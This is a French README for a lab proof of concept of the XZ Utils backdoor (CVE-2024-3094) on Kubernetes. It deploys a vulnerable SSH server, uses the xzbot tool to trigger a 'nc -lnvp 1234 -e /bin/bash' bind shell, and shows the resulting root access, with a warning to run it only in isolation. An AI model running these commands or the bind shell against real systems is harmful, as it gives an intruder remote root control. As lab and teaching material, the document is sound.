
XZ Utils CVE-2024-3094 POC pour Kubernetes
_ _ ____ _ _
( \/ )(_ )( \/ )
) ( / /_ \ /
(_/\_)(____) (__)
Ce projet est une preuve de concept (POC) compatible Kubernetes pour CVE-2024-3094 affectant XZ Utils. Consultez cet article pour une excellente présentation de la provenance et des mécanismes de l'exploit.
⚠⚠⚠
L'exécution de l'une des commandes ci-dessous peut entraîner le déploiement d'une application vulnérable extrêmement sensible aux attaques. Si vous décidez de suivre ces étapes, il est recommandé de le faire dans un environnement de test isolé du réseau.
⚠⚠⚠
kubectl create -f xzwhy.yml
Ceci déploiera un endpoint SSH vulnérable dont le point d'entrée est /bin/bash -c "env -i LANG=en_US.UTF-8 && unset TERM && unset LD_DEBUG && LD_LIBRARY_PATH=/CVE-2024-3094/ /usr/sbin/sshd -p 2222 -D"
L'endpoint SSH vulnérable expose deux ports via un load balancer : 2222 écoute les connexions SSH et 1234 est un port de commodité pour permettre l'accès à un port de bind shell que nous utiliserons pendant l'exploit.
type: LoadBalancer
ports:
- name: ssh
protocol: TCP
port: 2222
targetPort: 2222
- name: exploitshellingress
protocol: TCP
port: 1234
targetPort: 1234
Nous pouvons extraire l'URL du load balancer déployé à l'aide de kubectl :
xzwhy_endpoint=`kubectl get services -o jsonpath='{.items[0].status.loadBalancer.ingress[0].hostname}' --namespace=xzwhy-ns --field-selector metadata.name=xzwhy-loadbalancer` && echo $xzwhy_endpoint
Nous nous connectons maintenant au serveur vulnérable à l'aide de l'utilitaire teamnautilus/xzbot :
docker run -it --rm golang:latest /bin/bash -c "mkdir -p /xzbot && pushd /xzbot/ && git clone https://github.com/amlweems/xzbot.git && ls -laF && pushd ./xzbot/ && go build -o /xzbot/tmp/; popd && /xzbot/tmp/xzbot -h && /xzbot/tmp/xzbot -addr $xzwhy_endpoint:2222 -cmd 'nc -lnvp 1234 -e /bin/bash'"
Cela amènera le serveur SSH vulnérable à exécuter un bind shell via nc -lnvp 1234 -e /bin/bash pour nous. Après avoir exécuté cette commande, vous devriez voir quelque chose comme :
Cloning into 'xzbot'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 30 (delta 14), reused 25 (delta 10), pack-reused 0
Receiving objects: 100% (30/30), 422.65 KiB | 8.99 MiB/s, done.
Resolving deltas: 100% (14/14), done.
total 12
drwxr-xr-x 3 root root 4096 Apr 17 22:37 ./
drwxr-xr-x 1 root root 4096 Apr 17 22:37 ../
drwxr-xr-x 4 root root 4096 Apr 17 22:37 xzbot/
/xzbot/xzbot /xzbot /go
go: downloading github.com/cloudflare/circl v1.3.7
go: downloading golang.org/x/crypto v0.21.0
go: downloading golang.org/x/sys v0.18.0
/xzbot /go
Usage of /xzbot/tmp/xzbot:
-addr string
ssh server address (default "127.0.0.1:2222")
-cmd string
command to run via system() (default "id > /tmp/.xz")
-seed string
ed448 seed, must match xz backdoor key (default "0")
00000000 00 00 00 1c 73 73 68 2d 72 73 61 2d 63 65 72 74 |....ssh-rsa-cert|
00000010 2d 76 30 31 40 6f 70 65 6e 73 73 68 2e 63 6f 6d |[email protected]|
00000020 00 00 00 00 00 00 00 03 01 00 01 00 00 01 01 01 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 |................|
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000160 00 00 01 14 00 00 00 07 73 73 68 2d 72 73 61 00 |........ssh-rsa.|
00000170 00 00 01 01 00 00 01 00 34 12 00 00 78 56 00 00 |........4...xV..|
00000180 a2 ff d9 f9 ff ff ff ff a1 36 c4 cc b3 b2 4d b3 |.........6....M.|
00000190 99 11 52 a7 2c 38 d2 29 f9 5d 1a 06 63 36 1e 48 |..R.,8.).]..c6.H|
000001a0 9c 95 4e f1 77 41 07 92 1c a4 9f b0 b4 dc 93 c2 |..N.wA..........|
000001b0 66 03 3d fa 5c 8b 49 41 86 26 42 88 2b 9d 5b 4c |f.=.\.IA.&B.+.[L|
000001c0 b8 a4 5e 9d 62 c3 51 0a be ca 5d 8a 47 45 3a 1e |..^.b.Q...].GE:.|
000001d0 99 1f c1 0e 97 b7 58 ec 51 45 5b 24 3f b4 69 6a |......X.QE[$?.ij|
000001e0 68 45 7c 3b 3a d9 d7 0a ad 09 04 d8 a1 b9 81 22 |hE|;:.........."|
000001f0 58 69 eb 07 ad 91 53 15 b2 1d bf 47 b9 48 a0 4e |Xi....S....G.H.N|
00000200 8b 28 cd 82 4b fd 72 17 12 ce 7f e7 15 3c 9e fa |.(..K.r......<..|
00000210 a7 e1 d6 e4 ec eb 66 34 5a 74 00 00 00 00 00 00 |......f4Zt......|
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 07 |................|
00000280 73 73 68 2d 72 73 61 00 00 00 01 00 |ssh-rsa.....|
Connectez-vous au shell que vous avez lancé. Notez l'utilisation de la variable xzwhy_endpoint :
nc $xzwhy_endpoint 1234
Ce n'est pas évident au premier abord, mais la commande ci-dessus ouvre un bind shell en tant que root. Vous pouvez le vérifier en exécutant diverses commandes :
whoami
root
hostname -i
10.0.128.62
kubectl delete -f xzwhy.yml